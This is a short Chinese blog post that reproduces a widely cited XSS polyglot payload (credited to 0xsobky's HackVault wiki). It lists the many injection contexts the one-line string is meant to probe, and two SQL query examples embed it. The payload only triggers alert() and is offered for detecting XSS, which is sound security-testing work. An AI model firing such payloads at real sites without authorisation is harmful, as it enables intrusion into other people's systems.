一句话综合型检测XSS，

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

拿着这个Payload可检测大小写、注释、DOM等多种类型XSS

可以插入单引号，双引号，无引号的属性之中，html转义，href src属性 ,html注释 ,可插入任意html标签内容处，<div><title><style><textarea>,可插入js脚本单引号string 双引号string 正则表达式之中，单行注释//之后，多行注释/**/之中，可插入请求头之中的参数处比如set-cookie:x= xxx，可插入sql语句中，单引号双引号都可以，比如

 SELECT * FROM Users WHERE Username='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'
 SELECT * FROM Users WHERE Username="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"

From：https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

posted @ 2020-04-18 15:52 komomon 阅读(298) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

komomon

一句话综合型检测XSS，

公告